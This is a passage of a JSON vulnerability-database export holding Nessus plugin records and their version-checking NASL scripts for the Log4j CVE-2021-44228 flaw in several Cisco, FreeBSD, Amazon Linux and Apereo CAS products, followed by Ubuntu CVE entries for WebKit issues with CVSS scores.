constraints = [{'min_version': '12.0', 'fixed_version': '12.2.1', 'fixed_display': 'macOS Monterey 12.2.1'}];\n\nvcf::apple::macos::check_version_and_report(\n app_info:app_info,\n constraints:constraints,\n severity:SECURITY_WARNING\n);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-17T16:30:23", "description": "Cisco UCS Director is affected by the following critical vulnerability in the Apache Log4j Java logging library as described in the cisco-sa-apache-log4j-qRuKNEbd advisory.\n - Apache Log4j2 2.0-beta9 through 2.12.1 and 2.13.0 through 2.15.0 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints.\n An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0, this functionality has been completely removed. Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging Services projects. (CVE-2021-44228) Note that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2022-06-03T00:00:00", "type": "nessus", "title": "Cisco UCS Director Log4j Remote Code Execution (cisco-sa-apache-log4j-qRuKNEbd)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-44228"], "modified": "2023-02-17T00:00:00", "cpe": ["cpe:/a:cisco:ucs_director"], "id": "CISCO-SA-APACHE-LOG4J-QRUKNEBD-UCS-DIRECTOR.NASL", "href": "https://www.tenable.com/plugins/nessus/161813", "sourceData": "##\n# (C) Tenable, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(161813);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/02/17\");\n\n script_cve_id(\"CVE-2021-44228\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCwa47288\");\n script_xref(name:\"CISCO-SA\", value:\"cisco-sa-apache-log4j-qRuKNEbd\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/12/24\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0052\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2023-0004\");\n\n script_name(english:\"Cisco UCS Director Log4j Remote Code Execution (cisco-sa-apache-log4j-qRuKNEbd)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A package installed on the remote host is affected by a remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"Cisco UCS Director is affected by the following critical vulnerability in the Apache Log4j Java logging library\n as described in the cisco-sa-apache-log4j-qRuKNEbd advisory.\n \n - Apache Log4j2 2.0-beta9 through 2.12.1 and 2.13.0 through 2.15.0 JNDI features used in configuration, log\n messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints.\n An attacker who can control log messages or log message parameters can execute arbitrary code loaded from\n LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been\n disabled by default. From version 2.16.0, this functionality has been completely removed. Note that this\n vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging\n Services projects. (CVE-2021-44228)\n \n Note that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\n number.\");\n # https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-apache-log4j-qRuKNEbd\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?395cf983\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47288\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to the relevant fixed version referenced in Cisco bug ID CSCwa47288\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-44228\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/12/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/12/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/06/03\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:cisco:ucs_director\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CISCO\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"cisco_ucs_director_detect.nbin\");\n script_require_keys(\"Host/Cisco/UCSDirector/version\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\n\napp_info = vcf::get_app_info(app:'Cisco UCS Director', kb_ver:'Host/Cisco/UCSDirector/version');\n\n# UCS Director earlier than 6.8.2.0\nconstraints = [\n { 'fixed_version': '6.8.2.0'}\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-11-07T16:49:07", "description": "The version of FreeBSD installed on the remote host is prior to tested version. It is, therefore, affected by a vulnerability as referenced in the 1ea05bb8-5d74-11ec-bb1e-001517a2e1a4 advisory.\n\n - Apache Log4j2 <=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. In previous releases (>2.10) this behavior can be mitigated by setting system property log4j2.formatMsgNoLookups to true or it can be mitigated in prior releases (<2.10) by removing the JndiLookup class from the classpath (example: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class).\n (CVE-2021-44228)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2021-12-15T00:00:00", "type": "nessus", "title": "FreeBSD : serviio -- affected by log4j vulnerability (1ea05bb8-5d74-11ec-bb1e-001517a2e1a4)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-44228"], "modified": "2023-11-06T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:serviio", "cpe:/o:freebsd:freebsd"], "id": "FREEBSD_PKG_1EA05BB85D7411ECBB1E001517A2E1A4.NASL", "href": "https://www.tenable.com/plugins/nessus/156078", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# @NOAGENT@\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2021 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n#\n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(156078);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/11/06\");\n\n script_cve_id(\"CVE-2021-44228\");\n script_xref(name:\"IAVA\", value:\"2021-A-0573\");\n script_xref(name:\"IAVA\", value:\"0001-A-0650\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/12/24\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0052\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2023-0004\");\n\n script_name(english:\"FreeBSD : serviio -- affected by log4j vulnerability (1ea05bb8-5d74-11ec-bb1e-001517a2e1a4)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote FreeBSD host is missing one or more security-related updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of FreeBSD installed on the remote host is prior to tested version. It is, therefore, affected by a\nvulnerability as referenced in the 1ea05bb8-5d74-11ec-bb1e-001517a2e1a4 advisory.\n\n - Apache Log4j2 <=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect\n against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log\n messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup\n substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. In previous\n releases (>2.10) this behavior can be mitigated by setting system property log4j2.formatMsgNoLookups to\n true or it can be mitigated in prior releases (<2.10) by removing the JndiLookup class from the\n classpath (example: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class).\n (CVE-2021-44228)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n # https://vuxml.freebsd.org/freebsd/1ea05bb8-5d74-11ec-bb1e-001517a2e1a4.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?a7ebd9ba\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-44228\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/12/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/12/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/12/15\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:serviio\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"freebsd_package.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nvar flag = 0;\n\nvar packages = [\n 'serviio<2.2.1'\n];\n\nforeach var package( packages ) {\n if (pkg_test(save_report:TRUE, pkg: package)) flag++;\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : pkg_report_get()\n );\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:45:31", "description": "Cisco Identity Services Engine is affected by the following critical vulnerability in the Apache Log4j Java logging library as descibed in the cisco-sa-apache-log4j-qRuKNEbd advisory.\n\n - Apache Log4j2 2.0-beta9 through 2.12.1 and 2.13.0 through 2.15.0 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints.\n An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0, this functionality has been completely removed. Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging Services projects. (CVE-2021-44228)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2022-05-02T00:00:00", "type": "nessus", "title": "Cisco Identity Services Log4j Engine Remote Code Execution (cisco-sa-apache-log4j-qRuKNEbd)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-44228"], "modified": "2023-02-17T00:00:00", "cpe": ["cpe:/h:cisco:identity_services_engine", "cpe:/a:cisco:identity_services_engine", "cpe:/a:cisco:identity_services_engine_software"], "id": "CISCO-SA-APACHE-LOG4J-QRUKNEBD-ISE.NASL", "href": "https://www.tenable.com/plugins/nessus/160400", "sourceData": "##\n# (C) Tenable, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(160400);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/02/17\");\n\n script_cve_id(\"CVE-2021-44228\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCwa47133\");\n script_xref(name:\"CISCO-SA\", value:\"cisco-sa-apache-log4j-qRuKNEbd\");\n script_xref(name:\"IAVA\", value:\"2022-A-0138-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/12/24\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0052\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2023-0004\");\n\n script_name(english:\"Cisco Identity Services Log4j Engine Remote Code Execution (cisco-sa-apache-log4j-qRuKNEbd)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A package installed on the remote host is affected by a remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"Cisco Identity Services Engine is affected by the following critical vulnerability in the Apache Log4j Java \nlogging library as descibed in the cisco-sa-apache-log4j-qRuKNEbd advisory.\n\n - Apache Log4j2 2.0-beta9 through 2.12.1 and 2.13.0 through 2.15.0 JNDI features used in configuration, log\n messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints.\n An attacker who can control log messages or log message parameters can execute arbitrary code loaded from\n LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been\n disabled by default. From version 2.16.0, this functionality has been completely removed. Note that this\n vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging\n Services projects. (CVE-2021-44228)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n # https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-apache-log4j-qRuKNEbd\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?395cf983\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to the relevant fixed version referenced in Cisco bug ID CSCwa47133\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-44228\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/12/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/12/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/05/02\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:cisco:identity_services_engine\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:cisco:identity_services_engine\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:cisco:identity_services_engine_software\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CISCO\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"cisco_ise_detect.nbin\");\n script_require_keys(\"Host/Cisco/ISE/version\");\n\n exit(0);\n}\ninclude('ccf.inc');\ninclude('cisco_ise_func.inc');\n\nvar product_info = cisco::get_product_info(name:'Cisco Identity Services Engine Software');\n\nvar vuln_ranges = [\n {'min_ver':'2.4', 'fix_ver':'2.6.0.156', required_patch:'11'},\n {'min_ver':'2.7', 'fix_ver':'2.7.0.356', required_patch:'7'},\n {'min_ver':'3.0', 'fix_ver':'3.0.0.458', required_patch:'5'},\n {'min_ver':'3.1', 'fix_ver':'3.1.0.518', required_patch:'1'}\n];\n\nvar required_patch = get_required_patch(vuln_ranges:vuln_ranges, version:product_info['version']);\n\nif (empty_or_null(required_patch))\n audit(AUDIT_HOST_NOT, 'affected');\n\nvar reporting = make_array(\n 'port' , 0,\n 'severity' , SECURITY_HOLE,\n 'version' , product_info['version'],\n 'bug_id' , 'CSCwa47133',\n 'disable_caveat', TRUE,\n 'fix' , 'See vendor advisory'\n);\n\ncisco::check_and_report(\n product_info:product_info,\n reporting:reporting,\n vuln_ranges:vuln_ranges,\n required_patch:required_patch\n);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-09-30T17:57:24", "description": "The version of log4j-cve-2021-44228-hotpatch installed on the remote host is prior to 1.3-5. It is, therefore, affected by a vulnerability as referenced in the ALAS2-2022-1806 advisory.\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2022-06-16T00:00:00", "type": "nessus", "title": "Amazon Linux 2 : log4j-cve-2021-44228-hotpatch (ALAS-2022-1806)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-44228"], "modified": "2022-06-29T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:log4j-cve-2021-44228-hotpatch", "cpe:/o:amazon:linux:2"], "id": "AL2_ALAS-2022-1806.NASL", "href": "https://www.tenable.com/plugins/nessus/162309", "sourceData": "##\n# (C) Tenable, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux 2 Security Advisory ALAS-2022-1806.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(162309);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/06/29\");\n\n script_name(english:\"Amazon Linux 2 : log4j-cve-2021-44228-hotpatch (ALAS-2022-1806)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Amazon Linux 2 host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of log4j-cve-2021-44228-hotpatch installed on the remote host is prior to 1.3-5. It is, therefore, affected\nby a vulnerability as referenced in the ALAS2-2022-1806 advisory.\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/AL2/ALAS-2022-1806.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Run 'yum update log4j-cve-2021-44228-hotpatch' to update your system.\");\n script_set_attribute(attribute:\"risk_factor\", value:\"High\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/12/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/06/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/06/16\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:log4j-cve-2021-44228-hotpatch\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux:2\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nvar release = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nvar os_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nvar os_ver = os_ver[1];\nif (os_ver != \"2\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux 2\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar pkgs = [\n {'reference':'log4j-cve-2021-44228-hotpatch-1.3-5.amzn2', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE}\n];\n\nvar flag = 0;\nforeach var package_array ( pkgs ) {\n var reference = NULL;\n var release = NULL;\n var sp = NULL;\n var cpu = NULL;\n var el_string = NULL;\n var rpm_spec_vers_cmp = NULL;\n var epoch = NULL;\n var allowmaj = NULL;\n var exists_check = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) release = package_array['release'];\n if (!empty_or_null(package_array['sp'])) sp = package_array['sp'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['el_string'])) el_string = package_array['el_string'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (!empty_or_null(package_array['epoch'])) epoch = package_array['epoch'];\n if (!empty_or_null(package_array['allowmaj'])) allowmaj = package_array['allowmaj'];\n if (!empty_or_null(package_array['exists_check'])) exists_check = package_array['exists_check'];\n if (reference && release && (!exists_check || rpm_exists(release:release, rpm:exists_check))) {\n if (rpm_check(release:release, sp:sp, cpu:cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"log4j-cve-2021-44228-hotpatch\");\n}", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-09-26T15:39:56", "description": "The version of Apache Apereo CAS running on the remote web server is affected by a remote code execution vulnerability in the bundled Apache Log4j logging library. Apache Log4j is vulnerable due to insufficient protections on message lookup substitutions when dealing with user controlled input. A remote, unauthenticated attacker can exploit this, via a web request, to execute arbitrary code with the permission level of the running Java process.\n\nThis plugin requires that both the scanner and target machine have internet access.", "cvss3": {}, "published": "2022-07-26T00:00:00", "type": "nessus", "title": "Apache Apereo CAS Log4Shell Direct Check (CVE-2021-44228)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-44228"], "modified": "2023-09-25T00:00:00", "cpe": ["cpe:/a:apereo:central_authentication_service"], "id": "APACHE_APEREO_CAS_LOG4SHELL.NBIN", "href": "https://www.tenable.com/plugins/nessus/163453", "sourceData": "Binary data apache_apereo_cas_log4shell.nbin", "cvss": {"score": 0.0, "vector": "NONE"}}], "ubuntucve": [{"lastseen": "2023-11-28T13:49:25", "description": "A cross-origin issue in the IndexDB API was addressed with improved input\nvalidation. This issue is fixed in iOS 15.3 and iPadOS 15.3, watchOS 8.4,\ntvOS 15.3, Safari 15.3, macOS Monterey 12.2. A website may be able to track\nsensitive user information.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[jdstrand](<https://launchpad.net/~jdstrand>) | webkit receives limited support. For details, see https://wiki.ubuntu.com/SecurityTeam/FAQ#webkit webkit in Ubuntu uses the JavaScriptCore (JSC) engine, not V8\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2022-03-18T00:00:00", "type": "ubuntucve", "title": "CVE-2022-22594", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22594"], "modified": "2022-03-18T00:00:00", "id": "UB:CVE-2022-22594", "href": "https://ubuntu.com/security/CVE-2022-22594", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-11-28T13:49:23", "description": "A use after free issue was addressed with improved memory management. This\nissue is fixed in macOS Monterey 12.2.1, iOS 15.3.1 and iPadOS 15.3.1,\nSafari 15.3 (v. 16612.4.9.1.8 and 15612.4.9.1.8). Processing maliciously\ncrafted web content may lead to arbitrary code execution. Apple is aware of\na report that this issue may have been actively exploited..\n\n#### Notes\n\nAuthor| Note \n---|--- \n[jdstrand](<https://launchpad.net/~jdstrand>) | webkit receives limited support. For details, see https://wiki.ubuntu.com/SecurityTeam/FAQ#webkit webkit in Ubuntu uses the JavaScriptCore (JSC) engine, not V8\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-03-18T00:00:00", "type": "ubuntucve", "title": "CVE-2022-22620", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22620"], 